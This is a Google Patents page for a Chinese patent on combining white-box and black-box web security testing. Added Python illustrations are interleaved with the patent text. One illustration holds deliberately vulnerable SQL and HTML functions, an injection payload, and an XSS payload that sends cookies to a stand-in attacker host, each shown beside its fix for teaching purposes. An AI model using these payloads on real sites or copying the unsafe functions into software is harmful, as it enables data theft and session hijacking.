CN103116543A - Web application safety detection method with white-box and black-box combined - Google Patents

Web application safety detection method with white-box and black-box combined

Info

Publication number: CN103116543A
Application number: CN201310028848.0A (also shown as CN2013100288480A)
Authority: CN (China)
Prior art keywords: web application, box, white, black, carried out
Legal status: Granted; Active
Other languages: Chinese (zh)
Other versions: CN103116543B (en)
Inventors: 范杰, 石聪聪, 余勇, 郭骞, 高鹏, 俞庚申, 蒋诚智, 冯谷
Current assignees: State Grid Corp of China SGCC; China Electric Power Research Institute Co Ltd CEPRI; Global Energy Interconnection Research Institute
Original assignees: State Grid Corp of China SGCC; China Electric Power Research Institute Co Ltd CEPRI
Priority date / filing date: 2013-01-25 (application filed by State Grid Corp of China SGCC and China Electric Power Research Institute Co Ltd CEPRI)
Publication of CN103116543A: 2013-05-22
Application granted; publication of CN103116543B: 2015-11-18


Abstract

The invention provides a Web application security detection method that combines white-box and black-box testing. The method comprises the following steps: step 1, white-box testing is performed on the Web application system; step 2, black-box testing is performed on the Web application system; step 3, file association is performed by means of the file-association matching technique K; step 4, file search is performed by means of the file-search technique S; and step 5, the overall combined test is performed. The method solves two problems: the high false-alarm rate of white-box testing of a Web application system, and the inability of black-box testing to locate the source-code position of a vulnerability.

Description

Web application security detection method combining white-box and black-box testing
Technical field
The invention belongs to the field of information security and specifically relates to a Web application security detection method that combines white-box and black-box testing.
Background art
The continuous innovation and development of the Internet and its applications have greatly promoted social progress and the development of human civilisation, and have become one of the main driving forces of social development today. At the same time, information and network security faces unprecedented difficulties: the challenges facing the network security field are increasingly serious, and network security problems receive more attention by the day.
In the ordinary sense, the biggest threat to network security is the vulnerability in a Web application. Web application vulnerability detection is at present divided into two large classes: black-box testing and white-box testing.
Black-box testing is mainly testing performed while the Web application is running. Its detection depends on the external environment and on the test cases, so it carries a certain uncertainty, but it has the advantage of a low false-alarm rate. When the everyday functions of a Web application are tested, security testing is mainly black-box testing, and it mainly needs to pay attention to the following types of security problem of the Web platform.
XSS (cross-site scripting attack). XSS, also written CSS, is the abbreviation of Cross Site Script, meaning cross-site scripting attack. Concretely, a malicious attacker inserts malicious HTML code into a page of the Web application system; when a user browses that page, the HTML code embedded in it is executed, and the malicious user thereby achieves a specific purpose.
SQL injection. In the code of a Web application system it often happens that the legitimacy of user input data is not verified. This gives a malicious user an opportunity: the user can submit fragments of database statements and, from the results returned by the program, or even from error messages, obtain useful data such as database information. This is known as SQL injection.
Server-side interaction security problems. The general cause of this class of problem is, again, that user input is not filtered. Through such a vulnerability an attacker can execute arbitrary system commands on the server side and damage the Web application system.
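The following Python example is added here as an illustration and is not part of the patent. It shows the SQL-injection and XSS defects described above, each as the vulnerable form beside its hardened form: the unchecked input is concatenated into a statement or a page, and the fix is a parameterised query or output encoding. The table, rows, payloads and the use of an in-memory sqlite3 database in place of the application's own database are constructed assumptions. The server-side command-execution case follows the same rule (user input is never handed to a shell) and is not shown.

```python
"""Added example (not the patent's code): SQL injection and XSS, vulnerable vs hardened.
The schema, rows and payloads are constructed; sqlite3 stands in for the real database."""
import html
import sqlite3


def make_db():
    """Constructed sample database with two users and their secrets."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (name TEXT, secret TEXT)")
    con.executemany("INSERT INTO users VALUES (?, ?)",
                    [("alice", "s3cret"), ("bob", "hunter2")])
    return con


def lookup_unsafe(con, name):
    # The legitimacy of the user data is never checked: it is spliced straight into
    # the statement, so a quote in the input changes the SQL that is executed.
    sql = f"SELECT name, secret FROM users WHERE name = '{name}'"
    return con.execute(sql).fetchall()


def lookup_safe(con, name):
    # Parameterised query: the value is bound by the driver and can never be parsed
    # as SQL, whatever characters it contains.
    return con.execute("SELECT name, secret FROM users WHERE name = ?", (name,)).fetchall()


def render_unsafe(comment):
    # Raw interpolation into HTML: a comment containing <script> is executed in the
    # browser of every user who views the page.
    return f"<p>{comment}</p>"


def render_safe(comment):
    # Output encoding turns markup characters into entities, so the browser shows
    # the attacker's text instead of executing it.
    return f"<p>{html.escape(comment)}</p>"


if __name__ == "__main__":
    con = make_db()
    payload = "x' OR '1'='1"          # classic tautology fragment
    print(lookup_unsafe(con, payload))  # every row, secrets included
    print(lookup_safe(con, payload))    # no user is literally named x' OR '1'='1
    xss = "<script>document.location='http://evil.example/?c='+document.cookie</script>"
    print(render_unsafe(xss))
    print(render_safe(xss))
```

Running the block prints both rows of the table for the unsafe lookup and an empty list for the parameterised one, then the script tag verbatim and its entity-encoded form.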
White-box testing mainly refers to static source-code analysis techniques. The Web application source code is analysed line by line, and lexical analysis, data-flow analysis, control-flow analysis and other analyses are used to find security defects in the code. It avoids the deficiencies described above, but has the disadvantage of a higher false-alarm rate.
Data-flow analysis is a technique used at compile time: it collects the semantic information of the program from the program code and determines, by algebraic methods, the definitions and uses of variables at compile time. Data-flow analysis is used for compiler optimisation, program verification, debugging, testing, parallelisation, vectorisation, serial programming environments and similar problems.
The basic method of control-flow analysis is to identify the basic blocks of the program, construct a directed graph that reflects the program's control flow, and analyse the control-structure information of that directed graph. Control-flow analysis is therefore built on two basic entities: the basic block and the control-flow graph.
Lexical analysis here does not only mean the lexical analysis implemented in a compiler; it also includes simple syntactic and semantic analysis. The code is analysed lexically, the content of interest is extracted according to a property database, a simple contextual analysis is performed, and an alarm is raised at the problematic position. The property database mainly contains the functions that can give rise to security problems, for example strcpy and printf/sprintf/snprintf. For different target functions, the lexical analyser calls different handler functions to analyse the parameters of the dangerous function.
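The following Python example is added as an illustration of the lexical analysis just described and is not the patent's own scanner. It tokenises C source, looks up each called function in a small property database of dangerous functions, and dispatches to a per-function handler that inspects the call's arguments (for instance, a printf whose format is not a string literal). The tokeniser, the property database entries, the handler rules, the messages and the C sample are all constructed for illustration and are deliberately much simpler than a real static analyser.

```python
"""Added example (not the patent's code): a lexical scanner driven by a property
database of dangerous C functions. Everything here is constructed for illustration."""
import re
from dataclasses import dataclass


@dataclass
class Finding:
    line: int
    func: str
    message: str


# Minimal tokeniser: string literals, identifiers, numbers, any other single char.
_TOKEN = re.compile(r'"(?:\\.|[^"\\])*"|[A-Za-z_]\w*|\d+|\S')


def _split_args(tokens, start):
    """tokens[start] is '('. Return (argument token lists, index after matching ')')."""
    depth, args, cur, i = 0, [], [], start
    while i < len(tokens):
        t = tokens[i]
        if t == '(':
            depth += 1
            if depth > 1:
                cur.append(t)
        elif t == ')':
            depth -= 1
            if depth == 0:
                if cur:
                    args.append(cur)
                return args, i + 1
            cur.append(t)
        elif t == ',' and depth == 1:
            args.append(cur)
            cur = []
        else:
            cur.append(t)
        i += 1
    return args, i  # unbalanced parentheses: return what was collected


def _is_string_literal(arg):
    return len(arg) == 1 and arg[0].startswith('"')


# Handlers: each receives the call's argument token lists and returns a message or None.
def _check_format(args):
    # printf family: a non-literal format string can be attacker controlled.
    if args and not _is_string_literal(args[0]):
        return "format string is not a literal (format-string vulnerability)"
    return None


def _check_sprintf(args):
    if len(args) >= 2 and not _is_string_literal(args[1]):
        return "non-literal format string written into an unbounded buffer"
    return "unbounded write into buffer; prefer snprintf with a size"


def _check_snprintf(args):
    if len(args) >= 3 and not _is_string_literal(args[2]):
        return "format string is not a literal"
    return None


def _check_strcpy(args):
    return "unbounded copy; length of source is not checked"


# Property database: dangerous function name -> handler for its parameters.
PROPERTY_DB = {
    "printf": _check_format,
    "fprintf": lambda a: _check_format(a[1:]),
    "sprintf": _check_sprintf,
    "snprintf": _check_snprintf,
    "strcpy": _check_strcpy,
}


def scan_source(src: str):
    """Lexically scan C source and report dangerous calls with a simple context check."""
    findings = []
    for lineno, line in enumerate(src.splitlines(), 1):
        tokens = _TOKEN.findall(line)
        for i, tok in enumerate(tokens[:-1]):
            if tok in PROPERTY_DB and tokens[i + 1] == '(':
                args, _ = _split_args(tokens, i + 1)
                msg = PROPERTY_DB[tok](args)
                if msg:
                    findings.append(Finding(lineno, tok, msg))
    return findings


# Constructed C sample: three dangerous calls and two acceptable ones.
SAMPLE_C = '''\
#include <stdio.h>
#include <string.h>
void greet(const char *name) {
    char buf[64];
    strcpy(buf, name);
    printf(buf);
    printf("%s\\n", name);
    snprintf(buf, sizeof buf, "%s", name);
    sprintf(buf, "hello %s", name);
}
'''

if __name__ == "__main__":
    for f in scan_source(SAMPLE_C):
        print(f"line {f.line}: {f.func}: {f.message}")
```

On the sample the scanner flags strcpy on line 5, the non-literal printf format on line 6 and the sprintf on line 9, and stays silent on the literal-format printf and the bounded snprintf. It reports every strcpy regardless of context, which is exactly the kind of rule that gives white-box tools their high false-alarm rate.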
Summary of the invention
To overcome the above defects, the invention provides a Web application security detection method combining white-box and black-box testing, which solves the problems of the high false-alarm rate of white-box testing of a Web application system and the inability of black-box testing to locate the source-code position of a vulnerability.
To achieve the above objective, the invention provides a Web application security detection method combining white-box and black-box testing, whose improvement is that the method comprises the following steps:
(1). performing white-box testing on the Web application system;
(2). performing black-box testing on the Web application system;
(3). performing file association by means of K;
(4). performing file search by means of S;
(5). performing the overall combined test.
In a first preferred technical scheme provided by the invention, in step 1, W is deployed and WS is obtained, where DUT is the object under test.
In a second preferred technical scheme provided by the invention, in step 2, B is deployed and BS is obtained, where DUT is the object under test.
In a third preferred technical scheme provided by the invention, in step 3, K is used to associate WS-nF with PF, obtaining KF.
In a fourth preferred technical scheme provided by the invention, in step 4, S is used to search for the file BS-nF within KF, the result of associating WS-nF with PF, and F indicates whether the whole process succeeded.
In a fifth preferred technical scheme provided by the invention, step 5 comprises the following steps:
(5-1). deploying DUT, obtaining WS by scanning DUT with W, and obtaining BS by scanning DUT with B;
(5-2). taking the file WS-nF of a particular WS-n in WS and using K to associate it with PF to obtain KF;
(5-3). taking the file BS-nF of a particular BS-n in BS, using S to search for it in KF to obtain the result F, and judging from F whether the whole process succeeded.
Compared with the prior art, the Web application security detection method combining white-box and black-box testing provided by the invention follows a defined testing process and introduces the file-association matching technique K to realise the combination of white-box and black-box testing of a Web application system, solving the problems of the high false-alarm rate of white-box testing of a Web application system and the inability of black-box testing to locate the source-code position of a vulnerability.
Description of drawings
Fig. 1 is the logical diagram of direct detection by W.
Fig. 2 is the logical diagram of direct detection by B.
Fig. 3 is the result model diagram of direct detection by W.
Fig. 4 is the result model diagram of direct detection by B.
Fig. 5 is the process model diagram of associating WS-nF with PF by K.
Fig. 6 is the process model diagram of searching for the file BS-nF in KF by S.
Fig. 7 is the flow chart of the Web application security detection method combining white-box and black-box testing.
Embodiments
The symbols are defined as follows:
W: white-box testing.
WT: the set of techniques used by white-box testing; a particular technique is denoted WT-n (n=1,2,3...).
B: black-box testing.
P: the testing process.
DUT: the Web application system under test.
C: the source code of the Web application system.
PF: the set of source-code files of the Web application system; a particular file is denoted PF-n (n=1,2,3...).
WS: the result set of white-box testing; a particular result is denoted WS-n (n=1,2,3...).
BS: the result set of black-box testing; a particular result is denoted BS-n (n=1,2,3...).
LS: the vulnerability set; a particular vulnerability is denoted LS-n (n=1,2,3...).
WS-nF: the file in which a particular vulnerability in the white-box results is located.
BS-nF: the file in which a particular vulnerability in the black-box results is located; this vulnerability is of the same type as that of WS-nF.
K: the file-association matching technique, the key technique of the white/black-box combination, which associates the white-box results with the black-box results and locates the black-box results in the source-code files.
KF: the set of associated files found by K; a particular result is denoted KF-n (n=1,2,3...).
S: the file-search technique.
F: the flag indicating whether S found BS-nF in KF.
As shown in Fig. 7, a Web application security detection method combining white-box and black-box testing comprises the following steps:
(1). performing white-box testing on the Web application system;
(2). performing black-box testing on the Web application system;
(3). performing file association by means of K;
(4). performing file search by means of S;
(5). performing the overall combined test.
In step 1, W is deployed and WS is obtained, where DUT is the object under test.
In step 2, B is deployed and BS is obtained, where DUT is the object under test.
In step 3, K is used to associate WS-nF with PF, obtaining KF.
In step 4, S is used to search for the file BS-nF within KF, the result of associating WS-nF with PF, and F indicates whether the whole process succeeded.
Step 5 comprises the following steps:
(5-1). deploying DUT, obtaining WS by scanning DUT with W, and obtaining BS by scanning DUT with B;
(5-2). taking the file WS-nF of a particular WS-n in WS and using K to associate it with PF to obtain KF;
(5-3). taking the file BS-nF of a particular BS-n in BS, using S to search for it in KF to obtain the result F, and judging from F whether the whole process succeeded.
The Web application security detection method combining white-box and black-box testing is further explained by the following embodiment.
The main processing flow of the combined white-box and black-box testing technique for a Web application system is:
Performing white-box testing on the Web application system
According to the design structure of the direct-detection model of W in Fig. 1, W is deployed and WS is obtained, where DUT is the object under test.
Performing black-box testing on the Web application system
According to the design structure of the direct-detection model of B in Fig. 2, B is deployed and BS is obtained, where DUT is the object under test.
Performing file association by means of K
According to the basic file-association model of Fig. 5, K is used to associate WS-nF with PF, obtaining KF.
Performing file search by means of S
According to the basic file-search model of Fig. 6, S is used to search for the file BS-nF within KF, the result of associating WS-nF with PF, and F indicates whether the whole process succeeded.
Overall combined test
According to the structure of Fig. 7, DUT is deployed; first WS is obtained by scanning DUT with W and BS is obtained by scanning DUT with B; then the file WS-nF of a particular WS-n in WS is taken and associated with PF by K to obtain KF; finally the file BS-nF of a particular BS-n in BS is taken and searched for in KF by S to obtain the result F, and whether the whole process succeeded is judged from F.
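The following Python example is added as an illustration of steps (1) to (5) above, using the symbols defined in the description; it is not the patent's own implementation. The patent does not say how K and S are realised, so both are constructed assumptions here: K associates WS-nF with itself and with every file in PF that includes it (a defect in an included library surfaces in the pages that include it), and S maps the URL path of a black-box finding onto a file name and looks for it in KF. The white-box results WS, black-box results BS, source tree PF, vulnerability-type labels and URLs are all constructed. F is the per-pair flag; the combination returns the white-box alarms that a black-box hit of the same type corroborates, each carrying its source location, which is the point of the method: fewer white-box false alarms, and a file and line for the black-box finding.

```python
"""Added example (not the patent's code): a toy realisation of W/B result combination
with K (file association) and S (file search). K, S, PF, WS and BS are constructed."""
import re
from dataclasses import dataclass
from urllib.parse import urlparse


@dataclass(frozen=True)
class WhiteBoxResult:  # one WS-n
    id: str
    vuln_type: str
    file: str          # WS-nF
    line: int


@dataclass(frozen=True)
class BlackBoxResult:  # one BS-n
    id: str
    vuln_type: str
    url: str


# PF: constructed source tree (path -> contents). Only include/require lines matter to K.
PF = {
    "lib/db.php": "<?php function q($s){ return mysql_query(\"SELECT * FROM u WHERE n='$s'\"); }",
    "login.php": "<?php require 'lib/db.php'; q($_POST['user']);",
    "search.php": "<?php include 'lib/db.php'; echo $_GET['q'];",
    "about.php": "<?php echo 'static';",
}

_INCLUDE = re.compile(r"\b(?:include|require)(?:_once)?\s*\(?\s*['\"]([^'\"]+)['\"]")


def K(ws_file: str, pf: dict) -> set:
    """File association (assumed rule): KF = {WS-nF} plus every file in PF that includes it."""
    if ws_file not in pf:
        return set()
    kf = {ws_file}
    for path, src in pf.items():
        if ws_file in _INCLUDE.findall(src):
            kf.add(path)
    return kf


def S(bs: BlackBoxResult, kf: set) -> tuple:
    """File search (assumed rule): derive BS-nF from the URL path, look for it in KF.
    Returns (F, BS-nF)."""
    bs_file = urlparse(bs.url).path.lstrip("/") or "index.php"  # assumed URL-to-file mapping
    return bs_file in kf, bs_file


def combine(ws: list, bs: list, pf: dict) -> list:
    """Steps (3) to (5): for each WS-n associate its file via K, then search each
    same-type BS-n via S; keep the pairs for which F is true."""
    confirmed = []
    for w in ws:
        kf = K(w.file, pf)
        for b in bs:
            if b.vuln_type != w.vuln_type:
                continue
            f, bs_file = S(b, kf)
            if f:
                confirmed.append((w.id, b.id, w.file, w.line, bs_file))
    return confirmed


# Constructed WS and BS: what a white-box tool W and a black-box tool B might report.
WS = [
    WhiteBoxResult("WS-1", "sqli", "lib/db.php", 1),
    WhiteBoxResult("WS-2", "xss", "search.php", 1),
    WhiteBoxResult("WS-3", "xss", "about.php", 1),  # no black-box hit: treated as a false alarm
]
BS = [
    BlackBoxResult("BS-1", "sqli", "http://dut.example/login.php"),
    BlackBoxResult("BS-2", "xss", "http://dut.example/search.php?q=%3Cscript%3E"),
]

if __name__ == "__main__":
    for row in combine(WS, BS, PF):
        print(row)
```

With these inputs WS-1 (SQL injection in lib/db.php) is confirmed by BS-1 through login.php, which includes the library, and WS-2 is confirmed by BS-2 on search.php itself; WS-3 has no corroborating black-box result and is dropped. A real K would need a route-to-file map for frameworks whose URLs are not file paths, which the patent leaves open.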
It should be stated that the content and embodiments of the invention are intended to demonstrate the practical application of the technical scheme provided by the invention and should not be construed as limiting the scope of protection of the invention. Those skilled in the art may, inspired by the spirit and principles of the invention, make various modifications, equivalent replacements or improvements; all such changes or modifications fall within the scope of protection of the pending application.

Claims (6)

1. A Web application security detection method combining white-box and black-box testing, characterised in that the method comprises the following steps:
(1). performing white-box testing on the Web application system;
(2). performing black-box testing on the Web application system;
(3). performing file association by means of K;
(4). performing file search by means of S;
(5). performing the overall combined test.
2. The system according to claim 1, characterised in that, in step 1, W is deployed and WS is obtained, where DUT is the object under test.
3. The system according to claim 1, characterised in that, in step 2, B is deployed and BS is obtained, where DUT is the object under test.
4. The system according to claim 1, characterised in that, in step 3, K is used to associate WS-nF with PF, obtaining KF.
5. The system according to claim 1, characterised in that, in step 4, S is used to search for the file BS-nF within KF, the result of associating WS-nF with PF, and F indicates whether the whole process succeeded.
6. The system according to claim 1, characterised in that step 5 comprises the following steps:
(5-1). deploying DUT, obtaining WS by scanning DUT with W, and obtaining BS by scanning DUT with B;
(5-2). taking the file WS-nF of a particular WS-n in WS and using K to associate it with PF to obtain KF;
(5-3). taking the file BS-nF of a particular BS-n in BS, using S to search for it in KF to obtain the result F, and judging from F whether the whole process succeeded.

Priority Applications (1)

Application Number Priority Date Filing Date Title
CN201310028848.0A CN103116543B (en) 2013-01-25 2013-01-25 The Web application safety detection method that white black box combines

Applications Claiming Priority (1)

Application Number Priority Date Filing Date Title
CN201310028848.0A CN103116543B (en) 2013-01-25 2013-01-25 The Web application safety detection method that white black box combines

Publications (2)

Publication Number Publication Date
CN103116543A true CN103116543A (en) 2013-05-22
CN103116543B CN103116543B (en) 2015-11-18

Family

ID=48414923

Family Applications (1)

Application Number Title Priority Date Filing Date
CN201310028848.0A Active CN103116543B (en) 2013-01-25 2013-01-25 The Web application safety detection method that white black box combines

Country Status (1)

Country Link
CN (1) CN103116543B (en)

Citations (2)

* Cited by examiner, † Cited by third party
Publication number Priority date Publication date Assignee Title
US6249882B1 (en) * 1998-06-15 2001-06-19 Hewlett-Packard Company Methods and systems for automated software testing
CN101241467A (en) * 2008-03-05 2008-08-13 罗笑南 Automatized white box test system and method facing to WEB application

Non-Patent Citations (1)

* Cited by examiner, † Cited by third party
Title
项颖: "Design and implementation of a WEB security testing tool based on the AHP algorithm" (基于AHP算法的WEB安全性测试工具的设计与实现), China Master's Theses Full-text Database, Information Science and Technology (中国优秀硕士学位论文全文数据库信息科技辑), no. 2, 15 February 2012 (2012-02-15), pages 22-45 *

Cited By (6)

* Cited by examiner, † Cited by third party
Publication number Priority date Publication date Assignee Title
CN104346573A (en) * 2013-07-31 2015-02-11 广州市品高软件开发有限公司 Method and device for realizing WEB application system information security frame
CN110119616A (en) * 2019-04-18 2019-08-13 广州市品高软件股份有限公司 WEB application security protection system
CN110119616B (en) * 2019-04-18 2021-05-28 广州市品高软件股份有限公司 WEB application security protection system
CN110162980A (en) * 2019-05-31 2019-08-23 上交所技术有限责任公司 A kind of method of one-stop safety test and management in software development process
CN110162980B (en) * 2019-05-31 2023-04-18 上交所技术有限责任公司 One-stop safety testing and managing method in software development process
CN112269745A (en) * 2020-11-09 2021-01-26 北京嘀嘀无限科技发展有限公司 Test case processing method, device, equipment and storage medium

Also Published As

Publication number Publication date
CN103116543B (en) 2015-11-18


Legal Events

Date Code Title Description
C06 Publication
PB01 Publication
C10 Entry into substantive examination
SE01 Entry into force of request for substantive examination
C14 Grant of patent or utility model
GR01 Patent grant
C41 Transfer of patent application or patent right or utility model
TR01 Transfer of patent right
Effective date of registration: 20160427
Address after: 100192 Beijing city Haidian District Qinghe small Camp Road No. 15
Patentee after: China Electric Power Research Institute; State Grid Smart Grid Institute; State Grid Corporation of China
Address before: 100192 Beijing city Haidian District Qinghe small Camp Road No. 15
Patentee before: China Electric Power Research Institute; State Grid Corporation of China
C56 Change in the name or address of the patentee
CP01 Change in the name or title of a patent holder
Address after: 100192 Beijing city Haidian District Qinghe small Camp Road No. 15
Patentee after: China Electric Power Research Institute; GLOBAL ENERGY INTERCONNECTION RESEARCH INSTITUTE; State Grid Corporation of China
Address before: 100192 Beijing city Haidian District Qinghe small Camp Road No. 15
Patentee before: China Electric Power Research Institute; State Grid Smart Grid Institute; State Grid Corporation of China